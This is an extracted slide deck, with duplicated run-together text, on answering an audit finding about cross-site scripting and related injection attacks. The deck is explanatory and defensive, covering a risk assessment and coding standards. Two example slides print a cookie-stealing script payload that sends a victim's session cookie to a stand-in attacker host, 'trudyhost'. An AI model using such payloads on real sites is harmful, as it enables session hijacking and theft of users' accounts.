Web Audit VulnerabilityBusiness ProblemAudit ResponseSlide 4Resolution StepsInvestigationcross-site scriptingXSS conceptAuditor findingXSS typesRisksOur actual riskPlanned Audit ResponseMore on Web AttacksArtifactsCross Site Scripting Example 1Cross Site Scripting Example 2Cross Site Scripting DetectionSQL Injection ExampleSQL Injection DetectionXPATH Injection ExampleLDAP Injection ExampleLDAP Injection DetectionSSI Injection ExampleSSI Injection DetectionJSP Injection ExampleJSP Injection PreventionDefense ApproachesQ&ASlide 30Backup Slidesuser agent injectionApproachesXPATH Injection DetectionWeb Audit Web Audit VulnerabilityVulnerabilitycross-site scripting (XSS) cross-site scripting (XSS) concernsconcernsby Ron Widitzby Ron WiditzBusiness ProblemBusiness ProblemIndependent security auditIndependent security auditRegulatory complianceRegulatory complianceXSS issue raisedXSS issue raisedMust provide a responseMust provide a responseAudit ResponseAudit ResponseEither:Either:–Prove issue to be a non-problemProve issue to be a non-problemoror–Describe actions to takeDescribe actions to takeResolution StepsResolution StepsInvestigate security concernsInvestigate security concernsRestate as IT problem(s)Restate as IT problem(s)Determine solution(s)Determine solution(s)Provide audit responseProvide audit responseMitigate riskMitigate riskInvestigationInvestigationDefine cross-site scripting (XSS)Define cross-site scripting (XSS)Examine how auditors appliedExamine how auditors appliedIdentify risksIdentify risksResearch preliminary solutionsResearch preliminary solutionscross-site scriptingcross-site scriptingAttacker goal: their code into Attacker goal: their code into browserbrowserXSS forces a website to execute XSS forces a website to execute malicious code in browsermalicious code in browserBrowser user is the intended victimBrowser user is the intended victimWhy? Account hijacking, keystroke Why? Account hijacking, keystroke recording, intranet hacking, theft…recording, intranet hacking, theft…XSS conceptXSS conceptAuditor findingAuditor findingFreeform edit Freeform edit boxboxMessage to Message to Customer Customer ServiceServiceXSS typesXSS typesImmediate reflection : phishingImmediate reflection : phishingDOM-based : 95 JavaScript methodsDOM-based : 95 JavaScript methodsRedirection : header, meta, dynamicRedirection : header, meta, dynamicMultimedia : Flash, QT, PDF scriptsMultimedia : Flash, QT, PDF scriptsCross-Site Request Forgery (CSRF)Cross-Site Request Forgery (CSRF) others…others…–(e.g. non-persistent search box)(e.g. non-persistent search box)RisksRisksXSS abuses render engines or XSS abuses render engines or plug-insplug-insSteal browser cookiesSteal browser cookiesSteal session info for replay Steal session info for replay attackattackMalware or bot installationMalware or bot installationRedirect or phishing attemptRedirect or phishing attemptOur actual riskOur actual riskCurrently, none.Currently, none.Edit box info viewed in thick clientEdit box info viewed in thick clientDHTML or JavaScript needs DHTML or JavaScript needs browserbrowserOur thick client is Java Swing-Our thick client is Java Swing-basedbasedPlanned Audit Planned Audit ResponseResponseCould indicate “no audit problem”Could indicate “no audit problem”Might have future impactMight have future impactAddress through dev standardsAddress through dev standardsConsider application firewallConsider application firewallWiden problem scope to include Widen problem scope to include all user agent injection tacticsall user agent injection tacticsMore on Web AttacksMore on Web AttacksCross Site ScriptingCross Site ScriptingSQL InjectionSQL InjectionXPATH InjectionXPATH InjectionLDAP InjectionLDAP InjectionSSI (server side inclusion) SSI (server side inclusion) InjectionInjectionJSP (Java server pages) InjectionJSP (Java server pages) InjectionArtifactsArtifactsFor each injection issue:For each injection issue:–Vulnerability description documentedVulnerability description documented–Preventative coding techniquePreventative coding techniqueDiscuss with App Dev teamsDiscuss with App Dev teams–Publish and socialize directionPublish and socialize direction–Include in peer reviews/code walkthroughsInclude in peer reviews/code walkthroughs–Set deadlines for full incorporationSet deadlines for full incorporationCommunicate with auditorsCommunicate with auditorsCross Site Scripting Cross Site Scripting Example 1Example 1Trudy posts the following JavaScript on Trudy posts the following JavaScript on a message board:a message board:<SCRIPT><SCRIPT>document.location='http://trudyhost/cgdocument.location='http://trudyhost/cgi-bin/i-bin/stealcookie.cgi?'+document.cookiestealcookie.cgi?'+document.cookie</SCRIPT></SCRIPT>When Bob views the posted message, When Bob views the posted message, his browser executes the malicious his browser executes the malicious script, and his session cookie is sent to script, and his session cookie is sent to TrudyTrudyCross Site Scripting Cross Site Scripting Example 2Example 2Trudy sends a link to the following URL to Bob Trudy sends a link to the following URL to Bob that will take him to a personalized page:that will take him to a personalized page:http://host/personalizedpage.php?http://host/personalizedpage.php?username=<script>document.location='http://trusername=<script>document.location='http://trudyhost/cgi-udyhost/cgi-bin/stealcookie.cgi?'+document.cookie</script>bin/stealcookie.cgi?'+document.cookie</script>A page is returned that contains the malicious A page is returned that contains the malicious script instead of the username Bob, and Bob’s script instead of the username Bob, and Bob’s browser executes the script causing his session browser executes the script causing his session cookie to be sent to Trudycookie to be sent to TrudyHex is often used in place of ASCII for the Hex is often used in place of ASCII for the JavaScript to make the URL less suspiciousJavaScript to make the URL less suspiciousCross Site Scripting Cross Site Scripting DetectionDetectionA client usually is not supposed to A client usually is not supposed to send scripts to serverssend scripts to servers–If the server receives <SCRIPT>… or If the server receives <SCRIPT>… or the hex equivalent
View Full Document